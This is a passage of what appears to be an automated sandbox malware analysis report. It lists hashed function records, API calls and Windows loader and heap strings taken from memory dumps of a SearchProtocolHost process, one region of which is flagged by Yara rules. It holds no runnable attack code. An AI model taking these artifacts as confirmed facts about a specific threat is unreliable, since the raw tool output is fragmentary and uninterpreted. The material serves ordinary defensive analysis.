                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 37a6de043e202667fa1e2e29d085f17b47aabf27df50f7b72b6580e7291ae504
                                                                                      • Instruction ID: fec601fcb04e5b69f5b5c5c11e165c710bad246462ae2fa3d5d5595a1a180334
                                                                                      • Opcode Fuzzy Hash: 37a6de043e202667fa1e2e29d085f17b47aabf27df50f7b72b6580e7291ae504
                                                                                      • Instruction Fuzzy Hash: A2E065B2200204BBDB10EE59EC45FEB73AEEF89B10F008409F909A7241CA30BD108BB4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 02DA73BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 77cb1a76331d42d0383fcfa7b0c8655081736428b1bb318653fd1f1e5fe9c6b4
                                                                                      • Instruction ID: a5dfd024ecab73c91673125022124e318ee36bd14634210f1c8d6b505e7090a0
                                                                                      • Opcode Fuzzy Hash: 77cb1a76331d42d0383fcfa7b0c8655081736428b1bb318653fd1f1e5fe9c6b4
                                                                                      • Instruction Fuzzy Hash: 42E080711C020417FB346578DC55F6E33589F48728F195560BD6CDB3C1D674FD418150
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,02DA17CA,02DA1F49,02DB3317,00000000), ref: 02DA71D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode
                                                                                      • String ID:
                                                                                      • API String ID: 2340568224-0
                                                                                      • Opcode ID: 3224cbca99b0c1f04ffd3871c3f6221f63dd543392996e9d5c9d95626dcd4610
                                                                                      • Instruction ID: 5b479e971efdebac83f099ceaff69492008115fb5511e26f31d750ede6fc49a6
                                                                                      • Opcode Fuzzy Hash: 3224cbca99b0c1f04ffd3871c3f6221f63dd543392996e9d5c9d95626dcd4610
                                                                                      • Instruction Fuzzy Hash: 6ED05E726802057BFB10B7E5DC02F5A368DAB447A8F194064BA0CD73C3E964E9014AB5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7723967934ce08f8e8ea666058e61517b98087981a28d6475dd6de32ef569c46
                                                                                      • Instruction ID: 7737df77b02c1d1cbd0cc8241dcc107fb58b5b580fee09321e52fc49c3ea4c63
                                                                                      • Opcode Fuzzy Hash: 7723967934ce08f8e8ea666058e61517b98087981a28d6475dd6de32ef569c46
                                                                                      • Instruction Fuzzy Hash: 1DB09B719054C5D5EA11D76047087177D1467D0701F15C565D1460681F8778C091F576
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • corrupted critical section, xrefs: 038052CD
                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038052D9
                                                                                      • double initialized or corrupted critical section, xrefs: 03805313
                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 038052ED
                                                                                      • 8, xrefs: 038050EE
                                                                                      • undeleted critical section in freed memory, xrefs: 03805236
                                                                                      • Thread identifier, xrefs: 03805345
                                                                                      • Critical section address., xrefs: 0380530D
                                                                                      • Invalid debug info address of this critical section, xrefs: 038052C1
                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 03805215, 038052A1, 03805324
                                                                                      • Critical section address, xrefs: 03805230, 038052C7, 0380533F
                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 0380534E
                                                                                      • Address of the debug info found in the active list., xrefs: 038052B9, 03805305
                                                                                      • Critical section debug info address, xrefs: 0380522A, 03805339
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                      • API String ID: 0-2368682639
                                                                                      • Opcode ID: 2bdd65aab15091d071eead4fc5b02687004a82a94bef0154141917b1085959ad
                                                                                      • Instruction ID: 1fb9d355c4253d5ad9bba272723495d7c95e46469813ce9fb201958cb343013b
                                                                                      • Opcode Fuzzy Hash: 2bdd65aab15091d071eead4fc5b02687004a82a94bef0154141917b1085959ad
                                                                                      • Instruction Fuzzy Hash: 53818EB1A41348BFDF60CFA4CC49BAEBBB4FB49714F144199E514BB281D3B5A940CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                      • API String ID: 0-2515994595
                                                                                      • Opcode ID: 7579f2afbefe87e90a539919c5a3fe45f0d0e5da090e4f2b50064b1958913dc6
                                                                                      • Instruction ID: f2fd90b67a856efa8d4a58c010551662d9befcd8f53fe1d4dc4bb3fb1ebdc3a7
                                                                                      • Opcode Fuzzy Hash: 7579f2afbefe87e90a539919c5a3fe45f0d0e5da090e4f2b50064b1958913dc6
                                                                                      • Instruction Fuzzy Hash: 0451C0B15043549BD329DF588884BABB7ECEBC5754F084A6EB9A9C7240E770D608CBD2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                      • API String ID: 0-3532704233
                                                                                      • Opcode ID: f8c24528de7ac4e361cce9a91fd8ca0f76e15b29e57b15d0f38fa68a8e2aa880
                                                                                      • Instruction ID: 09798c419f820856c083d70f77dc7aa5bd36fffb168e0c876bab55f1353281e3
                                                                                      • Opcode Fuzzy Hash: f8c24528de7ac4e361cce9a91fd8ca0f76e15b29e57b15d0f38fa68a8e2aa880
                                                                                      • Instruction Fuzzy Hash: 81B1BF725493559FC721EF28C484B6FBBE8AF88754F09496EF889D7280D770D908CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0378D0E6
                                                                                      • @, xrefs: 0378D24F
                                                                                      • Control Panel\Desktop\LanguageConfiguration, xrefs: 0378D136
                                                                                      • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0378D202
                                                                                      • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0378D06F
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0378D263
                                                                                      • @, xrefs: 0378D09D
                                                                                      • @, xrefs: 0378D2B3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                      • API String ID: 0-1356375266
                                                                                      • Opcode ID: be19ab0d6553ba9c8e9c1f0ba1f2967c7ae45eba202bb392f9cf36318d142d5b
                                                                                      • Instruction ID: f541cbb95567d1aa136bef344e39a125e3e5f6f6998d680d95b027b9db55b27a
                                                                                      • Opcode Fuzzy Hash: be19ab0d6553ba9c8e9c1f0ba1f2967c7ae45eba202bb392f9cf36318d142d5b
                                                                                      • Instruction Fuzzy Hash: 26A15BB19483459FD721EF25C484B9BF7E8BF88725F01492EF9989A280D774D908CB93
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                      • API String ID: 0-2224505338
                                                                                      • Opcode ID: ac050bd4e91f317b0866429744f4261bb0df0cd1fde2d42a4b6522b507a11ab7
                                                                                      • Instruction ID: a7753c8b778de5c3767d7ba633b9adba9011f52d8e2b53699d9efcba86724107
                                                                                      • Opcode Fuzzy Hash: ac050bd4e91f317b0866429744f4261bb0df0cd1fde2d42a4b6522b507a11ab7
                                                                                      • Instruction Fuzzy Hash: C9510576A81388EFC711EF98C858E1AB3A4EF06A64F1844D5F906DB322D675D940DAD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • VerifierDebug, xrefs: 03818925
                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 038186E7
                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 0381880F
                                                                                      • HandleTraces, xrefs: 0381890F
                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 038186BD
                                                                                      • VerifierDlls, xrefs: 0381893D
                                                                                      • VerifierFlags, xrefs: 038188D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                      • API String ID: 0-3223716464
                                                                                      • Opcode ID: e66c2ca0832d600ba3ce6dec4ce1fb2898577da6141df28d08989c5fbbe9fcbf
                                                                                      • Instruction ID: f8931b8e155cc0fe6ec8b06a1a7c2cf3ff1527f6e3851a3737518f99ce21cef8
                                                                                      • Opcode Fuzzy Hash: e66c2ca0832d600ba3ce6dec4ce1fb2898577da6141df28d08989c5fbbe9fcbf
                                                                                      • Instruction Fuzzy Hash: A4914876640B55AFD721EFE88892B2AB7ECAB45B14F0809D8F944EF251C770AC10C792
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                      • API String ID: 0-523794902
                                                                                      • Opcode ID: a5955342f5c77c80e57b8fcc684c211960cf2b84f3351837f868205eadda1d89
                                                                                      • Instruction ID: 63d1c3fbef84ccb04c8e7f2b509dc7429f6918dd215d5c389b36f720e72d67e8
                                                                                      • Opcode Fuzzy Hash: a5955342f5c77c80e57b8fcc684c211960cf2b84f3351837f868205eadda1d89
                                                                                      • Instruction Fuzzy Hash: 7742EF352487819FC715EF28D888A2AFBE5FF88604F0849AEE896CB651D734D841CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                      • API String ID: 0-122214566
                                                                                      • Opcode ID: 1acbddcb7bfdc57814e9f68a9f0fd69e269e00caecc3af5d6c62e89acecc93a0
                                                                                      • Instruction ID: 15d9d9d37ae728dd34e3b92fb33887b194015f19246ef55e757394ce7b5e81a5
                                                                                      • Opcode Fuzzy Hash: 1acbddcb7bfdc57814e9f68a9f0fd69e269e00caecc3af5d6c62e89acecc93a0
                                                                                      • Instruction Fuzzy Hash: 17C13775A00B15AFDF24DB6CC894BBEB7A4AF85700F18426AD912EB3D1D7B0D844D391
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-792281065
                                                                                      • Opcode ID: 00b8ed07769f12444355752c0a0d72b69175204564cfaf880fd3fc104a6d03c6
                                                                                      • Instruction ID: 66eb2328561d3984b0705ca184bae30ace2cefba18424a2de252ca8ac70fe9b9
                                                                                      • Opcode Fuzzy Hash: 00b8ed07769f12444355752c0a0d72b69175204564cfaf880fd3fc104a6d03c6
                                                                                      • Instruction Fuzzy Hash: 1F916974B017549FDB64EF98DD89BAE77A4AF45B14F0801ECEA11AF2C1D7B09801CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                      • API String ID: 0-1745908468
                                                                                      • Opcode ID: 9079b1a3f98ac6797a5975314a327de9a7bf9903450cd5c1a2693c5886c515ec
                                                                                      • Instruction ID: 512cffb76c8c2b5e416cd220942ad09158f09d3aa4e311ca27918eb89bcf4f2b
                                                                                      • Opcode Fuzzy Hash: 9079b1a3f98ac6797a5975314a327de9a7bf9903450cd5c1a2693c5886c515ec
                                                                                      • Instruction Fuzzy Hash: 2A91FD39A04749DFCB12EFA8C444AADBBF2FF8A710F188099E541DB352C7759941CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • LdrpInitializeImportRedirection, xrefs: 03807F82, 03807FF6
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 037CC5E3
                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 03807FF0
                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 03807F8C, 03808000
                                                                                      • LdrpInitializeProcess, xrefs: 037CC5E4
                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 03807F7B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                      • API String ID: 0-475462383
                                                                                      • Opcode ID: ecc37c2ce7feb684f27ddca6f5bc0628caa4f8fea6afae5493a54cc5d7e75cc0
                                                                                      • Instruction ID: af2715625f6a6578ada86addbdf966c332a7c2d6e9be7c4744691ee7a9936326
                                                                                      • Opcode Fuzzy Hash: ecc37c2ce7feb684f27ddca6f5bc0628caa4f8fea6afae5493a54cc5d7e75cc0
                                                                                      • Instruction Fuzzy Hash: 6C31F7B96047419FC215EF68EC59E1AB7E8EF84B10F04059CF895AB291D660EC05CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03801F82
                                                                                      • RtlGetAssemblyStorageRoot, xrefs: 03801F6A, 03801FA4, 03801FC4
                                                                                      • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03801F8A
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 03801F6F
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 03801FC9
                                                                                      • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 03801FA9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                      • API String ID: 0-861424205
                                                                                      • Opcode ID: 858969fab486f3da404c28cb771b43cc1736a0ce292de12cc8d6fe41fa73b693
                                                                                      • Instruction ID: 4e2be3b919418842477720377fef16c1da6afc83c5ec43a37b970fc4018f4286
                                                                                      • Opcode Fuzzy Hash: 858969fab486f3da404c28cb771b43cc1736a0ce292de12cc8d6fe41fa73b693
                                                                                      • Instruction Fuzzy Hash: 9231C67AB002547BEF20DAC9CC49F6FB6689B41B64F0544ADF911BB283D670AA00C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 037B5167
                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 037B519B
                                                                                      • Kernel-MUI-Language-SKU, xrefs: 037B534B
                                                                                      • WindowsExcludedProcs, xrefs: 037B514A
                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 037B5272
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                      • API String ID: 0-258546922
                                                                                      • Opcode ID: 2992c067577a5f05f10b92f3e5e81fd58d5000b3ac0fd8e2378f9b6c03ce2f5e
                                                                                      • Instruction ID: b53db989f4ade5b257ce0bb0a847232a6eae3a653ac6fbe436ee82e81ec22866
                                                                                      • Opcode Fuzzy Hash: 2992c067577a5f05f10b92f3e5e81fd58d5000b3ac0fd8e2378f9b6c03ce2f5e
                                                                                      • Instruction Fuzzy Hash: D5F14E76D01219EFCB11DFA9C984AEEBBBDFF49620F14416AE505EB210D7709E01DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 0-1975516107
                                                                                      • Opcode ID: eddc45f09bcaf7ad8c23f460daa2e1f553c07451767eb1204587828802520510
                                                                                      • Instruction ID: 5633545ad1774d30667ce5fdf191500e0bef4f8adbd71f0fbcb19220c2d4e9ed
                                                                                      • Opcode Fuzzy Hash: eddc45f09bcaf7ad8c23f460daa2e1f553c07451767eb1204587828802520510
                                                                                      • Instruction Fuzzy Hash: 5E513475A047499FCB24EFA8C5887EEBBF1FF48304F1841ADC805AB291D774A881CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 037C8341
                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 037C847E
                                                                                      • @, xrefs: 037C84B1
                                                                                      • LdrpInitializeProcess, xrefs: 037C8342
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • .Local, xrefs: 037C27F8
                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03801FE3, 038020BB
                                                                                      • SXS: %s() passed the empty activation context, xrefs: 03801FE8
                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 038020C0
                                                                                      Similarity
                                                                                      • API ID:
